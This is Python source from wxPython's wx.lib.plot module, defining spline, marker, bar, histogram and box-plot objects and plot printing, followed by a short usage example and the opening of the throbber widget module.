``colour='black'`` Line color :class:`wx.Colour`
``width=1`` Line width float
``style=wx.PENSTYLE_SOLID`` Line style :class:`wx.PenStyle`
``legend=''`` Legend string str
=========================== ============= ====================
.. warning::
All methods except ``__init__`` are private.
"""
_attributes = {'colour': 'black',
'width': 1,
'style': wx.PENSTYLE_SOLID,
'legend': ''}
def __init__(self, points, **attr):
PolyLine.__init__(self, points, **attr)
def draw(self, dc, printerScale, coord=None):
""" Draw the spline """
colour = self.attributes['colour']
width = self.attributes['width'] * printerScale * self._pointSize[0]
style = self.attributes['style']
if not isinstance(colour, wx.Colour):
colour = wx.Colour(colour)
pen = wx.Pen(colour, width, style)
pen.SetCap(wx.CAP_ROUND)
dc.SetPen(pen)
if coord is None:
if len(self.scaled) >= 3:
dc.DrawSpline(self.scaled)
else:
dc.DrawLines(coord) # draw legend line
class PolyMarker(PolyPoints):
"""
Creates a PolyMarker object.
:param points: The marker coordinates.
:type points: list of ``[x, y]`` values
:param **attr: keyword attributes
================================= ============= ====================
Keyword and Default Description Type
================================= ============= ====================
``marker='circle'`` see below str
``size=2`` Marker size float
``colour='black'`` Outline color :class:`wx.Colour`
``width=1`` Outline width float
``style=wx.PENSTYLE_SOLID`` Outline style :class:`wx.PenStyle`
``fillcolour=colour`` fill color :class:`wx.Colour`
``fillstyle=wx.BRUSHSTYLE_SOLID`` fill style :class:`wx.BrushStyle`
``legend=''`` Legend string str
================================= ============= ====================
=================== ==================================
Marker Description
=================== ==================================
``'circle'`` A circle of diameter ``size``
``'dot'`` A dot. Does not have a size.
``'square'`` A square with side length ``size``
``'triangle'`` An upward-pointed triangle
``'triangle_down'`` A downward-pointed triangle
``'cross'`` An "X" shape
``'plus'`` A "+" shape
=================== ==================================
.. warning::
All methods except ``__init__`` are private.
"""
_attributes = {'colour': 'black',
'width': 1,
'size': 2,
'fillcolour': None,
'fillstyle': wx.BRUSHSTYLE_SOLID,
'marker': 'circle',
'legend': ''}
def __init__(self, points, **attr):
PolyPoints.__init__(self, points, attr)
def draw(self, dc, printerScale, coord=None):
""" Draw the points """
colour = self.attributes['colour']
width = self.attributes['width'] * printerScale * self._pointSize[0]
size = self.attributes['size'] * printerScale * self._pointSize[0]
fillcolour = self.attributes['fillcolour']
fillstyle = self.attributes['fillstyle']
marker = self.attributes['marker']
if colour and not isinstance(colour, wx.Colour):
colour = wx.Colour(colour)
if fillcolour and not isinstance(fillcolour, wx.Colour):
fillcolour = wx.Colour(fillcolour)
dc.SetPen(wx.Pen(colour, width))
if fillcolour:
dc.SetBrush(wx.Brush(fillcolour, fillstyle))
else:
dc.SetBrush(wx.Brush(colour, fillstyle))
if coord is None:
if len(self.scaled): # bugfix for Mac OS X
self._drawmarkers(dc, self.scaled, marker, size)
else:
self._drawmarkers(dc, coord, marker, size) # draw legend marker
def getSymExtent(self, printerScale):
"""Width and Height of Marker"""
s = 5 * self.attributes['size'] * printerScale * self._pointSize[0]
return (s, s)
def _drawmarkers(self, dc, coords, marker, size=1):
f = getattr(self, "_{}".format(marker))
f(dc, coords, size)
def _circle(self, dc, coords, size=1):
fact = 2.5 * size
wh = 5.0 * size
rect = np.zeros((len(coords), 4), np.float64) + [0.0, 0.0, wh, wh]
rect[:, 0:2] = coords - [fact, fact]
dc.DrawEllipseList(rect.astype(np.int32))
def _dot(self, dc, coords, size=1):
dc.DrawPointList(coords)
def _square(self, dc, coords, size=1):
fact = 2.5 * size
wh = 5.0 * size
rect = np.zeros((len(coords), 4), np.float64) + [0.0, 0.0, wh, wh]
rect[:, 0:2] = coords - [fact, fact]
dc.DrawRectangleList(rect.astype(np.int32))
def _triangle(self, dc, coords, size=1):
shape = [(-2.5 * size, 1.44 * size),
(2.5 * size, 1.44 * size), (0.0, -2.88 * size)]
poly = np.repeat(coords, 3, 0)
poly.shape = (len(coords), 3, 2)
poly += shape
dc.DrawPolygonList(poly.astype(np.int32))
def _triangle_down(self, dc, coords, size=1):
shape = [(-2.5 * size, -1.44 * size),
(2.5 * size, -1.44 * size), (0.0, 2.88 * size)]
poly = np.repeat(coords, 3, 0)
poly.shape = (len(coords), 3, 2)
poly += shape
dc.DrawPolygonList(poly.astype(np.int32))
def _cross(self, dc, coords, size=1):
fact = 2.5 * size
for f in [[-fact, -fact, fact, fact], [-fact, fact, fact, -fact]]:
lines = np.concatenate((coords, coords), axis=1) + f
dc.DrawLineList(lines.astype(np.int32))
def _plus(self, dc, coords, size=1):
fact = 2.5 * size
for f in [[-fact, 0, fact, 0], [0, -fact, 0, fact]]:
lines = np.concatenate((coords, coords), axis=1) + f
dc.DrawLineList(lines.astype(np.int32))
class PolyBarsBase(PolyPoints):
"""
Base class for PolyBars and PolyHistogram.
.. warning::
All methods are private.
"""
_attributes = {'edgecolour': 'black',
'edgewidth': 2,
'edgestyle': wx.PENSTYLE_SOLID,
'legend': '',
'fillcolour': 'red',
'fillstyle': wx.BRUSHSTYLE_SOLID,
'barwidth': 1.0
}
def __init__(self, points, attr):
"""
"""
PolyPoints.__init__(self, points, attr)
def _scaleAndShift(self, data, scale=(1, 1), shift=(0, 0)):
"""same as override method, but retuns a value."""
scaled = scale * data + shift
return scaled
def getSymExtent(self, printerScale):
"""Width and Height of Marker"""
h = self.attributes['edgewidth'] * printerScale * self._pointSize[0]
w = 5 * h
return (w, h)
def set_pen_and_brush(self, dc, printerScale):
pencolour = self.attributes['edgecolour']
penwidth = (self.attributes['edgewidth']
* printerScale * self._pointSize[0])
penstyle = self.attributes['edgestyle']
fillcolour = self.attributes['fillcolour']
fillstyle = self.attributes['fillstyle']
if not isinstance(pencolour, wx.Colour):
pencolour = wx.Colour(pencolour)
pen = wx.Pen(pencolour, penwidth, penstyle)
pen.SetCap(wx.CAP_BUTT)
if not isinstance(fillcolour, wx.Colour):
fillcolour = wx.Colour(fillcolour)
brush = wx.Brush(fillcolour, fillstyle)
dc.SetPen(pen)
dc.SetBrush(brush)
def scale_rect(self, rect):
# Scale the points to the plot area
scaled_rect = self._scaleAndShift(rect,
self.currentScale,
self.currentShift)
# Convert to (left, top, width, height) for drawing
wx_rect = [scaled_rect[0][0], # X (left)
scaled_rect[0][1], # Y (top)
scaled_rect[1][0] - scaled_rect[0][0], # Width
scaled_rect[1][1] - scaled_rect[0][1]] # Height
return wx_rect
def draw(self, dc, printerScale, coord=None):
pass
class PolyBars(PolyBarsBase):
"""
Creates a PolyBars object.
:param points: The data to plot.
:type points: sequence of ``(center, height)`` points
:param **attr: keyword attributes
================================= ============= =======================
Keyword and Default Description Type
================================= ============= =======================
``barwidth=1.0`` bar width float or list of floats
``edgecolour='black'`` edge color :class:`wx.Colour`
``edgewidth=1`` edge width float
``edgestyle=wx.PENSTYLE_SOLID`` edge style :class:`wx.PenStyle`
``fillcolour='red'`` fill color :class:`wx.Colour`
``fillstyle=wx.BRUSHSTYLE_SOLID`` fill style :class:`wx.BrushStyle`
``legend=''`` legend string str
================================= ============= =======================
.. important::
If ``barwidth`` is a list of floats:
+ each bar will have a separate width
+ ``len(barwidth)`` must equal ``len(points)``.
.. warning::
All methods except ``__init__`` are private.
"""
def __init__(self, points, **attr):
PolyBarsBase.__init__(self, points, attr)
def calc_rect(self, x, y, w):
""" Calculate the rectangle for plotting. """
return self.scale_rect([[x - w / 2, y], # left, top
[x + w / 2, 0]]) # right, bottom
def draw(self, dc, printerScale, coord=None):
""" Draw the bars """
self.set_pen_and_brush(dc, printerScale)
barwidth = self.attributes['barwidth']
if coord is None:
if isinstance(barwidth, (int, float)):
# use a single width for all bars
pts = ((x, y, barwidth) for x, y in self.points)
elif isinstance(barwidth, (list, tuple)):
# use a separate width for each bar
if len(barwidth) != len(self.points):
err_str = ("Barwidth ({} items) and Points ({} items) do "
"not have the same length!")
err_str = err_str.format(len(barwidth), len(self.points))
raise ValueError(err_str)
pts = ((x, y, w) for (x, y), w in zip(self.points, barwidth))
else:
# invalid attribute type
err_str = ("Invalid type for 'barwidth'. Expected float, "
"int, or list or tuple of (int or float). Got {}.")
raise TypeError(err_str.format(type(barwidth)))
rects = [self.calc_rect(x, y, w) for x, y, w in pts]
dc.DrawRectangleList(rects)
else:
dc.DrawLines(coord) # draw legend line
class PolyHistogram(PolyBarsBase):
"""
Creates a PolyHistogram object.
:param hist: The histogram data.
:type hist: sequence of ``y`` values that define the heights of the bars
:param binspec: The bin specification.
:type binspec: sequence of ``x`` values that define the edges of the bins
:param **attr: keyword attributes
================================= ============= =======================
Keyword and Default Description Type
================================= ============= =======================
``edgecolour='black'`` edge color :class:`wx.Colour`
``edgewidth=3`` edge width float
``edgestyle=wx.PENSTYLE_SOLID`` edge style :class:`wx.PenStyle`
``fillcolour='blue'`` fill color :class:`wx.Colour`
``fillstyle=wx.BRUSHSTYLE_SOLID`` fill style :class:`wx.BrushStyle`
``legend=''`` legend string str
================================= ============= =======================
.. tip::
Use ``np.histogram()`` to easily create your histogram parameters::
hist_data, binspec = np.histogram(data)
hist_plot = PolyHistogram(hist_data, binspec)
.. important::
``len(binspec)`` must equal ``len(hist) + 1``.
.. warning::
All methods except ``__init__`` are private.
"""
def __init__(self, hist, binspec, **attr):
if len(binspec) != len(hist) + 1:
raise ValueError("Len(binspec) must equal len(hist) + 1")
self.hist = hist
self.binspec = binspec
# define the bins and center x locations
self.bins = list(pairwise(self.binspec))
bar_center_x = (pair[0] + (pair[1] - pair[0])/2 for pair in self.bins)
points = list(zip(bar_center_x, self.hist))
PolyBarsBase.__init__(self, points, attr)
def calc_rect(self, y, low, high):
""" Calculate the rectangle for plotting. """
return self.scale_rect([[low, y], # left, top
[high, 0]]) # right, bottom
def draw(self, dc, printerScale, coord=None):
""" Draw the bars """
self.set_pen_and_brush(dc, printerScale)
if coord is None:
rects = [self.calc_rect(y, low, high)
for y, (low, high)
in zip(self.hist, self.bins)]
dc.DrawRectangleList(rects)
else:
dc.DrawLines(coord) # draw legend line
class PolyBoxPlot(PolyPoints):
"""
Creates a PolyBoxPlot object.
:param data: Raw data to create a box plot from.
:type data: sequence of int or float
:param **attr: keyword attributes
================================= ============= =======================
Keyword and Default Description Type
================================= ============= =======================
``colour='black'`` edge color :class:`wx.Colour`
``width=1`` edge width float
``style=wx.PENSTYLE_SOLID`` edge style :class:`wx.PenStyle`
``legend=''`` legend string str
================================= ============= =======================
.. note::
``np.NaN`` and ``np.inf`` values are ignored.
.. admonition:: TODO
+ [ ] Figure out a better way to get multiple box plots side-by-side
(current method is a hack).
+ [ ] change the X axis to some labels.
+ [ ] Change getClosestPoint to only grab box plot items and outliers?
Currently grabs every data point.
+ [ ] Add more customization such as Pens/Brushes, outlier shapes/size,
and box width.
+ [ ] Figure out how I want to handle log-y: log the data then calc the BP?
      Or should I calc the BP first and then plot it on a log scale?
"""
_attributes = {'colour': 'black',
'width': 1,
'style': wx.PENSTYLE_SOLID,
'legend': '',
}
def __init__(self, points, **attr):
# Set various attributes
self.box_width = 0.5
# Determine the X position and create a 1d dataset.
self.xpos = points[0, 0]
points = points[:, 1]
# Calculate the box plot points and the outliers
self._bpdata = self.calcBpData(points)
self._outliers = self.calcOutliers(points)
points = np.concatenate((self._bpdata, self._outliers))
points = np.array([(self.xpos, x) for x in points])
# Create a jitter for the outliers
self.jitter = (0.05 * np.random.random_sample(len(self._outliers))
+ self.xpos - 0.025)
# Init the parent class
PolyPoints.__init__(self, points, attr)
def _clean_data(self, data=None):
"""
Removes NaN and Inf from the data.
"""
if data is None:
data = self.points
# clean out NaN and infinity values.
data = data[~np.isnan(data)]
data = data[~np.isinf(data)]
return data
def boundingBox(self):
"""
Returns bounding box for the plot.
Override method.
"""
xpos = self.xpos
minXY = np.array([xpos - self.box_width / 2, self._bpdata.min * 0.95])
maxXY = np.array([xpos + self.box_width / 2, self._bpdata.max * 1.05])
return minXY, maxXY
def getClosestPoint(self, pntXY, pointScaled=True):
"""
Returns the index of closest point on the curve, pointXY,
scaledXY, distance x, y in user coords.
Override method.
if pointScaled == True, then based on screen coords
if pointScaled == False, then based on user coords
"""
xpos = self.xpos
# combine the outliers with the box plot data
data_to_use = np.concatenate((self._bpdata, self._outliers))
data_to_use = np.array([(xpos, x) for x in data_to_use])
if pointScaled:
# Use screen coords
p = self.scaled
pxy = self.currentScale * np.array(pntXY) + self.currentShift
else:
# Using user coords
p = self._points
pxy = np.array(pntXY)
# determine distance for each point
d = np.sqrt(np.add.reduce((p - pxy) ** 2, 1)) # sqrt(dx^2+dy^2)
pntIndex = np.argmin(d)
dist = d[pntIndex]
return [pntIndex,
self.points[pntIndex],
self.scaled[pntIndex] / self._pointSize,
dist]
def getSymExtent(self, printerScale):
"""Width and Height of Marker"""
# TODO: does this need to be updated?
h = self.attributes['width'] * printerScale * self._pointSize[0]
w = 5 * h
return (w, h)
def calcBpData(self, data=None):
"""
Box plot points:
Median (50%)
75%
25%
low_whisker = lowest value that's >= (25% - (IQR * 1.5))
high_whisker = highest value that's <= 75% + (IQR * 1.5)
outliers are outside of 1.5 * IQR
Parameters
----------
data : array-like
The data to plot
Returns
-------
bpdata : collections.namedtuple
Descriptive statistics for data:
(min_data, low_whisker, q25, median, q75, high_whisker, max_data)
"""
data = self._clean_data(data)
min_data = float(np.min(data))
max_data = float(np.max(data))
q25 = float(np.percentile(data, 25))
q75 = float(np.percentile(data, 75))
iqr = q75 - q25
low_whisker = float(data[data >= q25 - 1.5 * iqr].min())
high_whisker = float(data[data <= q75 + 1.5 * iqr].max())
median = float(np.median(data))
BPData = namedtuple("bpdata", ("min", "low_whisker", "q25", "median",
"q75", "high_whisker", "max"))
bpdata = BPData(min_data, low_whisker, q25, median,
q75, high_whisker, max_data)
return bpdata
def calcOutliers(self, data=None):
"""
Calculates the outliers. Must be called after calcBpData.
"""
data = self._clean_data(data)
outliers = data
outlier_bool = np.logical_or(outliers > self._bpdata.high_whisker,
outliers < self._bpdata.low_whisker)
outliers = outliers[outlier_bool]
return outliers
def _scaleAndShift(self, data, scale=(1, 1), shift=(0, 0)):
"""same as override method, but retuns a value."""
scaled = scale * data + shift
return scaled
@TempStyle('pen')
def draw(self, dc, printerScale, coord=None):
"""
Draws a box plot on the DC.
Notes
-----
The following draw order is required:
1. First the whisker line
2. Then the IQR box
3. Lastly the median line.
This is because
+ The whiskers are drawn as a single line rather than two lines
+ The median line must be visible over the box if the box has a fill.
Other than that, the draw order can be changed.
"""
self._draw_whisker(dc, printerScale)
self._draw_iqr_box(dc, printerScale)
self._draw_median(dc, printerScale) # median after box
self._draw_whisker_ends(dc, printerScale)
self._draw_outliers(dc, printerScale)
@TempStyle('pen')
def _draw_whisker(self, dc, printerScale):
"""Draws the whiskers as a single line"""
xpos = self.xpos
# We draw it as one line and then hide the middle part with
# the IQR rectangle
whisker_line = np.array([[xpos, self._bpdata.low_whisker],
[xpos, self._bpdata.high_whisker]])
whisker_line = self._scaleAndShift(whisker_line,
self.currentScale,
self.currentShift)
whisker_pen = wx.Pen(wx.BLACK, 2, wx.PENSTYLE_SOLID)
whisker_pen.SetCap(wx.CAP_BUTT)
dc.SetPen(whisker_pen)
dc.DrawLines(whisker_line)
@TempStyle('pen')
def _draw_iqr_box(self, dc, printerScale):
"""Draws the Inner Quartile Range box"""
xpos = self.xpos
box_w = self.box_width
iqr_box = [[xpos - box_w / 2, self._bpdata.q75], # left, top
[xpos + box_w / 2, self._bpdata.q25]] # right, bottom
# Scale it to the plot area
iqr_box = self._scaleAndShift(iqr_box,
self.currentScale,
self.currentShift)
# rectangles are drawn (left, top, width, height) so adjust
iqr_box = [iqr_box[0][0], # X (left)
iqr_box[0][1], # Y (top)
iqr_box[1][0] - iqr_box[0][0], # Width
iqr_box[1][1] - iqr_box[0][1]] # Height
box_pen = wx.Pen(wx.BLACK, 3, wx.PENSTYLE_SOLID)
box_brush = wx.Brush(wx.GREEN, wx.BRUSHSTYLE_SOLID)
dc.SetPen(box_pen)
dc.SetBrush(box_brush)
dc.DrawRectangleList([iqr_box])
@TempStyle('pen')
def _draw_median(self, dc, printerScale, coord=None):
"""Draws the median line"""
xpos = self.xpos
median_line = np.array(
[[xpos - self.box_width / 2, self._bpdata.median],
[xpos + self.box_width / 2, self._bpdata.median]]
)
median_line = self._scaleAndShift(median_line,
self.currentScale,
self.currentShift)
median_pen = wx.Pen(wx.BLACK, 4, wx.PENSTYLE_SOLID)
median_pen.SetCap(wx.CAP_BUTT)
dc.SetPen(median_pen)
dc.DrawLines(median_line)
@TempStyle('pen')
def _draw_whisker_ends(self, dc, printerScale):
"""Draws the end caps of the whiskers"""
xpos = self.xpos
fence_top = np.array(
[[xpos - self.box_width * 0.2, self._bpdata.high_whisker],
[xpos + self.box_width * 0.2, self._bpdata.high_whisker]]
)
fence_top = self._scaleAndShift(fence_top,
self.currentScale,
self.currentShift)
fence_bottom = np.array(
[[xpos - self.box_width * 0.2, self._bpdata.low_whisker],
[xpos + self.box_width * 0.2, self._bpdata.low_whisker]]
)
fence_bottom = self._scaleAndShift(fence_bottom,
self.currentScale,
self.currentShift)
fence_pen = wx.Pen(wx.BLACK, 2, wx.PENSTYLE_SOLID)
fence_pen.SetCap(wx.CAP_BUTT)
dc.SetPen(fence_pen)
dc.DrawLines(fence_top)
dc.DrawLines(fence_bottom)
@TempStyle('pen')
def _draw_outliers(self, dc, printerScale):
"""Draws dots for the outliers"""
# Set the pen
outlier_pen = wx.Pen(wx.BLUE, 5, wx.PENSTYLE_SOLID)
dc.SetPen(outlier_pen)
outliers = self._outliers
# Scale the data for plotting
pt_data = np.array([self.jitter, outliers]).T
pt_data = self._scaleAndShift(pt_data,
self.currentScale,
self.currentShift)
# Draw the outliers
size = 0.5
fact = 2.5 * size
wh = 5.0 * size
rect = np.zeros((len(pt_data), 4), np.float64) + [0.0, 0.0, wh, wh]
rect[:, 0:2] = pt_data - [fact, fact]
dc.DrawRectangleList(rect.astype(np.int32))
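# --- Illustrative sketch (not part of the original wx.lib.plot module) ------
# A minimal example of the statistics produced by ``calcBpData`` and
# ``calcOutliers`` above.  ``_demo_boxplot_stats`` is a hypothetical helper
# added purely for documentation; it assumes NumPy (>= 1.17 for default_rng)
# and the PolyBoxPlot class defined above.
def _demo_boxplot_stats():
    rng = np.random.default_rng(0)
    values = rng.normal(loc=50.0, scale=5.0, size=200)
    # PolyBoxPlot expects (x, y) points that all share one x position.
    points = np.array([(1.0, y) for y in values])
    bp = PolyBoxPlot(points)
    # _bpdata: (min, low_whisker, q25, median, q75, high_whisker, max)
    # _outliers: every value outside the 1.5 * IQR whiskers
    return bp._bpdata, bp._outliers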
class PlotGraphics(object):
"""
Creates a PlotGraphics object.
:param objects: The Poly objects to plot.
:type objects: list of :class:`~wx.lib.plot.PolyPoints` objects
:param title: The title shown at the top of the graph.
:type title: str
:param xLabel: The x-axis label.
:type xLabel: str
:param yLabel: The y-axis label.
:type yLabel: str
.. warning::
All methods except ``__init__`` are private.
"""
def __init__(self, objects, title='', xLabel='', yLabel=''):
if type(objects) not in [list, tuple]:
raise TypeError("objects argument should be list or tuple")
self.objects = objects
self._title = title
self._xLabel = xLabel
self._yLabel = yLabel
self._pointSize = (1.0, 1.0)
@property
def logScale(self):
if len(self.objects) == 0:
return
return [obj.logScale for obj in self.objects]
@logScale.setter
def logScale(self, logscale):
# XXX: error checking done by PolyPoints class
# if not isinstance(logscale, tuple) and len(logscale) != 2:
# raise TypeError("logscale must be a 2-tuple of bools")
if len(self.objects) == 0:
return
for obj in self.objects:
obj.logScale = logscale
def setLogScale(self, logscale):
"""
Set the log scale boolean value.
.. deprecated:: Feb 27, 2016
Use the :attr:`~wx.lib.plot.polyobjects.PlotGraphics.logScale`
property instead.
"""
pendingDeprecation("self.logScale property")
self.logScale = logscale
@property
def absScale(self):
if len(self.objects) == 0:
return
return [obj.absScale for obj in self.objects]
@absScale.setter
def absScale(self, absscale):
# XXX: error checking done by PolyPoints class
# if not isinstance(absscale, tuple) and len(absscale) != 2:
# raise TypeError("absscale must be a 2-tuple of bools")
if len(self.objects) == 0:
return
for obj in self.objects:
obj.absScale = absscale
def boundingBox(self):
p1, p2 = self.objects[0].boundingBox()
for o in self.objects[1:]:
p1o, p2o = o.boundingBox()
p1 = np.minimum(p1, p1o)
p2 = np.maximum(p2, p2o)
return p1, p2
def scaleAndShift(self, scale=(1, 1), shift=(0, 0)):
for o in self.objects:
o.scaleAndShift(scale, shift)
def setPrinterScale(self, scale):
"""
Thickens up lines and markers only for printing
.. deprecated:: Feb 27, 2016
Use the :attr:`~wx.lib.plot.polyobjects.PlotGraphics.printerScale`
property instead.
"""
pendingDeprecation("self.printerScale property")
self.printerScale = scale
def setXLabel(self, xLabel=''):
"""
Set the X axis label on the graph
.. deprecated:: Feb 27, 2016
Use the :attr:`~wx.lib.plot.polyobjects.PlotGraphics.xLabel`
property instead.
"""
pendingDeprecation("self.xLabel property")
self.xLabel = xLabel
def setYLabel(self, yLabel=''):
"""
Set the Y axis label on the graph
.. deprecated:: Feb 27, 2016
Use the :attr:`~wx.lib.plot.polyobjects.PlotGraphics.yLabel`
property instead.
"""
pendingDeprecation("self.yLabel property")
self.yLabel = yLabel
def setTitle(self, title=''):
"""
Set the title at the top of graph
.. deprecated:: Feb 27, 2016
Use the :attr:`~wx.lib.plot.polyobjects.PlotGraphics.title`
property instead.
"""
pendingDeprecation("self.title property")
self.title = title
def getXLabel(self):
"""
Get X axis label string
.. deprecated:: Feb 27, 2016
Use the :attr:`~wx.lib.plot.polyobjects.PlotGraphics.xLabel`
property instead.
"""
pendingDeprecation("self.xLabel property")
return self.xLabel
def getYLabel(self):
"""
Get Y axis label string
.. deprecated:: Feb 27, 2016
Use the :attr:`~wx.lib.plot.polyobjects.PlotGraphics.yLabel`
property instead.
"""
pendingDeprecation("self.yLabel property")
return self.yLabel
def getTitle(self, title=''):
"""
Get the title at the top of graph
.. deprecated:: Feb 27, 2016
Use the :attr:`~wx.lib.plot.polyobjects.PlotGraphics.title`
property instead.
"""
pendingDeprecation("self.title property")
return self.title
@property
def printerScale(self):
return self._printerScale
@printerScale.setter
def printerScale(self, scale):
"""Thickens up lines and markers only for printing"""
self._printerScale = scale
@property
def xLabel(self):
"""Get the X axis label on the graph"""
return self._xLabel
@xLabel.setter
def xLabel(self, text):
self._xLabel = text
@property
def yLabel(self):
"""Get the Y axis label on the graph"""
return self._yLabel
@yLabel.setter
def yLabel(self, text):
self._yLabel = text
@property
def title(self):
"""Get the title at the top of graph"""
return self._title
@title.setter
def title(self, text):
self._title = text
def draw(self, dc):
for o in self.objects:
# t=_time.perf_counter() # profile info
o._pointSize = self._pointSize
o.draw(dc, self._printerScale)
# print(o, "time=", _time.perf_counter()-t)
def getSymExtent(self, printerScale):
"""Get max width and height of lines and markers symbols for legend"""
self.objects[0]._pointSize = self._pointSize
symExt = self.objects[0].getSymExtent(printerScale)
for o in self.objects[1:]:
o._pointSize = self._pointSize
oSymExt = o.getSymExtent(printerScale)
symExt = np.maximum(symExt, oSymExt)
return symExt
def getLegendNames(self):
"""Returns list of legend names"""
lst = [None] * len(self)
for i in range(len(self)):
lst[i] = self.objects[i].getLegend()
return lst
def __len__(self):
return len(self.objects)
def __getitem__(self, item):
return self.objects[item]
# -------------------------------------------------------------------------
# Used to layout the printer page
class PlotPrintout(wx.Printout):
"""Controls how the plot is made in printing and previewing"""
# Do not change method names in this class,
# we have to override wx.Printout methods here!
def __init__(self, graph):
"""graph is instance of plotCanvas to be printed or previewed"""
wx.Printout.__init__(self)
self.graph = graph
def HasPage(self, page):
if page == 1:
return True
else:
return False
def GetPageInfo(self):
return (1, 1, 1, 1) # disable page numbers
def OnPrintPage(self, page):
dc = self.GetDC() # allows using floats for certain functions
# print("PPI Printer",self.GetPPIPrinter())
# print("PPI Screen", self.GetPPIScreen())
# print("DC GetSize", dc.GetSize())
# print("GetPageSizePixels", self.GetPageSizePixels())
# Note PPIScreen does not give the correct number
# Calculate everything for printer and then scale for preview
PPIPrinter = self.GetPPIPrinter() # printer dots/inch (w,h)
# PPIScreen= self.GetPPIScreen() # screen dots/inch (w,h)
dcSize = dc.GetSize() # DC size
if self.graph._antiAliasingEnabled and not isinstance(dc, wx.GCDC):
try:
dc = wx.GCDC(dc)
except Exception:
pass
else:
if self.graph._hiResEnabled:
# high precision - each logical unit is 1/20 of a point
dc.SetMapMode(wx.MM_TWIPS)
pageSize = self.GetPageSizePixels()  # page size in terms of pixels
clientDcSize = self.graph.GetClientSize()
# find what the margins are (mm)
pgSetupData = self.graph.pageSetupData
margLeftSize, margTopSize = pgSetupData.GetMarginTopLeft()
margRightSize, margBottomSize = pgSetupData.GetMarginBottomRight()
# calculate offset and scale for dc
pixLeft = margLeftSize * PPIPrinter[0] / 25.4 # mm*(dots/in)/(mm/in)
pixRight = margRightSize * PPIPrinter[0] / 25.4
pixTop = margTopSize * PPIPrinter[1] / 25.4
pixBottom = margBottomSize * PPIPrinter[1] / 25.4
plotAreaW = pageSize[0] - (pixLeft + pixRight)
plotAreaH = pageSize[1] - (pixTop + pixBottom)
# ratio offset and scale to screen size if preview
if self.IsPreview():
ratioW = float(dcSize[0]) / pageSize[0]
ratioH = float(dcSize[1]) / pageSize[1]
pixLeft *= ratioW
pixTop *= ratioH
plotAreaW *= ratioW
plotAreaH *= ratioH
# rescale plot to page or preview plot area
self.graph._setSize(plotAreaW, plotAreaH)
# Set offset and scale
dc.SetDeviceOrigin(pixLeft, pixTop)
# Thicken up pens and increase marker size for printing
ratioW = float(plotAreaW) / clientDcSize[0]
ratioH = float(plotAreaH) / clientDcSize[1]
aveScale = (ratioW + ratioH) / 2
if self.graph._antiAliasingEnabled and not self.IsPreview():
scale = dc.GetUserScale()
dc.SetUserScale(scale[0] / self.graph._pointSize[0],
scale[1] / self.graph._pointSize[1])
self.graph._setPrinterScale(aveScale)  # thickens up pens for printing
self.graph._printDraw(dc)
# rescale back to original
self.graph._setSize()
self.graph._setPrinterScale(1)
self.graph.Redraw() # to get point label scale and shift correct
return True
```
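Taken together, these classes are normally composed into a `PlotGraphics` container and handed to a `wx.lib.plot.PlotCanvas` for drawing. The sketch below is a minimal, hypothetical composition example; it assumes the public `wx.lib.plot` imports and does not itself create a canvas or `wx.App`.
```python
import numpy as np
from wx.lib.plot import PolyLine, PolyMarker, PlotGraphics

x = np.linspace(0.0, 10.0, 50)
# A continuous curve plus a sparser set of markers on the same axes.
curve = PolyLine(list(zip(x, np.sin(x))), colour='blue', width=2,
                 legend='sin(x)')
samples = PolyMarker(list(zip(x[::5], np.sin(x[::5]))), colour='red',
                     marker='circle', size=1.5, legend='samples')
graphics = PlotGraphics([curve, samples], title='Demo plot',
                        xLabel='x', yLabel='sin(x)')
# canvas.Draw(graphics)   # where `canvas` is a wx.lib.plot.PlotCanvas
```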
#### File: wx/lib/throbber.py
```python
import os
import wx
# ------------------------------------------------------------------------------
THROBBER_EVENT = wx.NewEventType()
EVT_UPDATE_THROBBER = wx.PyEventBinder(THROBBER_EVENT, 0)
class UpdateThrobberEvent(wx.PyEvent):
def __init__(self):
wx.PyEvent.__init__(self)
self.SetEventType(THROBBER_EVENT)
# ------------------------------------------------------------------------------
class Throbber(wx.Panel):
"""
The first argument is either the name of a file that will be split into frames
(a composite image) or a list of strings of image names that will be treated
as individual frames. If a single (composite) image is given, then additional
information must be provided: the number of frames in the image and the width
of each frame. The first frame is treated as the "at rest" frame (it is not
shown during animation, but only when Throbber.Rest() is called).
A second, single image may be optionally specified to overlay on top of the
animation. A label may also be specified to show on top of the animation.
"""
def __init__(self, parent, id,
bitmap,
pos = wx.DefaultPosition,
size = wx.DefaultSize,
frameDelay = 0.1,
frames = 0,
frameWidth = 0,
label = None,
overlay = None,
reverse = 0,
style = 0,
name = "throbber",
rest = 0,
current = 0,
direction = 1,
sequence = None
):
"""
Default class constructor.
:param `parent`: parent window, must not be ``None``
:param integer `id`: window identifier. A value of -1 indicates a default value
:param `bitmap`: a :class:`wx.Bitmap` to be used
:param `pos`: the control position. A value of (-1, -1) indicates a default position,
chosen by either the windowing system or wxPython, depending on platform
:param `size`: the control size. A value of (-1, -1) indicates a default size,
chosen by either the windowing system or wxPython, depending on platform
:param `frameDelay`: time delay between frames
:param `frames`: number of frames (only necessary for composite image)
:param `frameWidth`: width of each frame (only necessary for composite image)
:param string `label`: optional text to be displayed
:param `overlay`: optional :class:`wx.Bitmap` to overlay on animation
:param boolean `reverse`: reverse direction at end of animation
:param integer `style`: the underlying :class:`wx.Control` style
:param string `name`: the widget name.
:param `rest`: the rest frame
:param `current`: the current frame
:param `direction`: 1 advances, -1 reverses
:param `sequence`: sequence of frames, defaults to range(self.frames)
"""
super(Throbber, self).__init__(parent, id, pos, size, style, name)
self.name = name
self.label = label
self.running = False
_seqTypes = (type([]), type(()))
# set size, guessing if necessary
width, height = size
if width == -1:
if type(bitmap) in _seqTypes:
width = bitmap[0].GetWidth()
else:
if frameWidth:
width = frameWidth
if height == -1:
if type(bitmap) in _seqTypes:
height = bitmap[0].GetHeight()
else:
height = bitmap.GetHeight()
self.width, self.height = width, height
# double check it
assert width != -1 and height != -1, "Unable to guess size"
if label:
extentX, extentY = self.GetTextExtent(label)
self.labelX = (width - extentX)/2
self.labelY = (height - extentY)/2
self.frameDelay = frameDelay
self.rest = rest
self.current = current
self.direction = direction
self.autoReverse = reverse
self.overlay = overlay
if overlay is not None:
self.overlay = overlay
self.overlayX = (width - self.overlay.GetWidth()) / 2
self.overlayY = (height - self.overlay.GetHeight()) / 2
self.showOverlay = overlay is not None
self.showLabel = label is not None
# do we have a sequence of images?
if type(bitmap) in _seqTypes:
self.submaps = bitmap
self.frames = len(self.submaps)
# or a composite image that needs to be split?
else:
self.frames = frames
self.submaps = []
for chunk in range(frames):
rect = (chunk * frameWidth, 0, width, height)
self.submaps.append(bitmap.GetSubBitmap(rect))
